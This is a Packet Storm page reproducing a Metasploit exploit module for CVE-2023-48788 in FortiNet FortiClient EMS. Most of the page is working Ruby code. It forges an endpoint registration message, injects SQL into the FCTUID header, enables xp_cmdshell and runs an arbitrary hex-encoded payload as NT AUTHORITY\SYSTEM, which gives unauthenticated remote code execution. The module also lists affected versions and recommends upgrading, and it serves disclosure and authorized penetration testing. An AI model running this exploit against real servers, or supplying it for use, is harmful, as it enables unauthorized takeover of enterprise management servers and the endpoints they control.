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packetstormSpencer McIntyre, jheysel-r7, James Horseman, Zach Hanley, metasploit.comPACKETSTORM:178230
HistoryApr 23, 2024 - 12:00 a.m.

FortiNet FortiClient EMS 7.2.2 / 7.0.10 SQL Injection / Remote Code Execution

2024-04-2300:00:00
Spencer McIntyre, jheysel-r7, James Horseman, Zach Hanley, metasploit.com
packetstormsecurity.com
228
fortinet
sql injection
remote code execution
endpoint management server
vulnerability
unauthenticated
nt authority\system
version 7.2.0
version 7.2.2
version 7.0.1
version 7.0.10
upgrade
enrolled endpoint

AI Score

9.9

Confidence

High

EPSS

0.711

Percentile

98.1%

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::Tcp  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'FortiNet FortiClient Endpoint Management Server FCTID SQLi to RCE',  
'Description' => %q{  
An SQLi injection vulnerability exists in FortiNet FortiClient EMS (Endpoint Management Server).  
FortiClient EMS serves as an endpoint management solution tailored for enterprises, offering a centralized  
platform for overseeing enrolled endpoints. The SQLi is vulnerability is due to user controller strings which  
can be sent directly into database queries.  
  
FcmDaemon.exe is the main service responsible for communicating with enrolled clients. By default it listens on port 8013  
and communicates with FCTDas.exe which is responsible for translating requests and sending them to the database.  
In the message header of a specific request sent between the two services, the FCTUID parameter is vulnerable  
SQLi. The SQLi can used to enable the xp_cmdshell which can then be used to obtain unauthenticated remote code  
execution in the context of NT AUTHORITY\SYSTEM  
  
Affected versions of FortiClient EMS include:  
7.2.0 through 7.2.2  
7.0.1 through 7.0.10  
  
Upgrading to either 7.2.3, 7.0.11 or above is recommended by FortiNet.  
  
It should be noted that in order to be vulnerable, at least one endpoint needs to be enrolled / managed by FortiClient  
EMS for the necessary vulnerable services to be available.  
},  
'Author' => [  
'Zach Hanley', # Analysis & PoC  
'James Horseman', # Analysis & PoC  
'jheysel-r7', # Msf module  
'Spencer McIntyre' # Msf module assistance  
],  
'References' => [  
[ 'URL', 'https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-48788-fortinet-forticlientems-sql-injection-deep-dive/'],  
[ 'URL', 'https://github.com/horizon3ai/CVE-2023-48788/blob/main/CVE-2023-48788.py'],  
[ 'CVE', '2023-48788']  
],  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Privileged' => true,  
'Arch' => [ ARCH_CMD ],  
'Targets' => [  
[ 'Automatic Target', {}]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2024-04-21',  
'DefaultOptions' => {  
'SSL' => true,  
'RPORT' => 8013  
},  
'Notes' => {  
'Stability' => [ CRASH_SAFE ],  
'SideEffects' => [ IOC_IN_LOGS ],  
'Reliability' => [ REPEATABLE_SESSION ]  
}  
)  
)  
end  
  
def get_register_info  
register_info = <<~REGISTER_INFO  
AVSIG_VER=1.00000  
REG_KEY=_  
EP_ONNETCHKSUM=0  
AVENG_VER=6.00266  
DHCP_SERVER=None  
FCTOS=WIN64  
VULSIG_VER=1.00000  
FCTVER=7.0.7.0345  
APPSIG_VER=13.00364  
USER=Administrator  
APPENG_VER=4.00082  
AVALSIG_VER=0.00000  
VULENG_VER=2.00032  
OSVER=Microsoft Windows Server 2019 , 64-bit (build 17763)  
COM_MODEL=VMware Virtual Platform  
RSENG_VER=1.00020  
AV_PROTECTED=0  
AVALENG_VER=0.00000  
PEER_IP=  
ENABLED_FEATURE_BITMAP=49  
EP_OFFNETCHKSUM=0  
INSTALLED_FEATURE_BITMAP=158583  
EP_CHKSUM=0  
HIDDEN_FEATURE_BITMAP=155943  
DISKENC=  
HOSTNAME=CYBER-RETQB1FLP  
AV_PRODUCT=  
FCT_SN=FCT8001638848651  
INSTALLUID=#{Faker::Internet.uuid.upcase}  
NWIFS=Ethernet0|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|#{Faker::Internet.ip_v4_address}|#{Faker::Internet.mac_address}|1|*|0  
UTC=1710271774  
PC_DOMAIN=  
COM_MAN=VMware, Inc.  
CPU=Intel(R) Xeon(R) Silver 4215 CPU @ 2.50GHz  
MEM=12287  
HDD=99  
COM_SN=VMware-42 04 ed 2d 64 e8 0b 14-45 e9 e4 f6 5a c7 67 82  
DOMAIN=  
WORKGROUP=WORKGROUP  
USER_SID=S-1-5-21-#{rand(9) * 10}-#{rand(9) * 10}-#{rand(9) * 10}-500  
GROUP_TAG=  
ADGUID=  
EP_FGTCHKSUM=0  
EP_RULECHKSUM=0  
WF_FILESCHKSUM=0  
EP_APPCTRLCHKSUM=0  
REGISTER_INFO  
Rex::Text.encode_base64(register_info)  
end  
  
def get_message(sqli)  
message = "MSG_HEADER: FCTUID=CBE8FC122B1A46D18C3541E1A8EFF7BD{SQLI_PLACEHOLDER}\n"  
message << "IP=127.0.0.1\n"  
message << "MAC=#{Faker::Internet.mac_address}\n"  
message << "FCT_ONNET=0\n"  
message << "CAPS=32767\n"  
message << "VDOM=default\n"  
message << "EC_QUARANTINED=0\n"  
message << "SIZE= {SIZE_PLACEHOLDER}\n"  
message << "\n"  
message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"  
message << 'X-FCCK-REGISTER-END'  
message << "\r\n"  
message << "\r\n"  
message.gsub!('{SQLI_PLACEHOLDER}', sqli)  
message_length = message.length  
message_length = message_length - '{SIZE_PLACEHOLDER}'.length + message_length.to_s.length  
message.gsub!('{SIZE_PLACEHOLDER}', message_length.to_s)  
message  
end  
  
def send_message(sqli)  
message = get_message(sqli)  
vprint_status("Sending the following message: #{message}")  
  
buf = ''  
begin  
connect(true, { 'SSL' => true })  
sock.put(message)  
buf = sock.get_once || ''  
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e  
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")  
ensure  
disconnect  
end  
vprint_status("The response received was: #{buf}")  
buf  
end  
  
def check  
res = send_message("' OR 1=1; --")  
return CheckCode::Vulnerable('The SQLi has been exploited successfully') if res.include?('KA_INTERVAL')  
return CheckCode::Safe if res.include?("The FCT record doesn't exist")  
  
CheckCode::Unknown("#{peer} - FmcDaemon.exe does not appear to be running on the endpoint targeted")  
end  
  
def exploit  
# Things to note:  
# 1. xp_cmdshell is disabled by default so first we must enable it.  
# 2. The application takes the SQL statement we inject into and converts it all to upper case. This was causing  
# attempted Base64 encoded payloads to fail, and is why we send the payload has a hex string and decode it using SQL  
# before running the command with xp_command shell.  
# 3. We expect to see KA_INTERVAL in the response to every SQLi attempt except for when we deliver the payload which  
# is when we expect the response to be empty.  
inject = [  
"' OR 1=1; exec master.dbo.sp_configure 'show advanced options', 1;--",  
"' OR 1=1; reconfigure;--",  
"' OR 1=1; exec master.dbo.sp_configure 'xp_cmdshell',1;--",  
"' OR 1=1; reconfigure;--",  
"' OR 1=1; DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec master.dbo.xp_cmdshell @sql;--",  
]  
inject.each do |sqli|  
if sqli == inject.last  
send_message(sqli).empty? ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')  
else  
send_message(sqli).include?('KA_INTERVAL') ? print_good("The SQLi: #{sqli} was executed successfully") : fail_with(Failure::UnexpectedReply, 'The SQLi injection response indicated the injection was unsuccessful.')  
end  
end  
end  
end  
`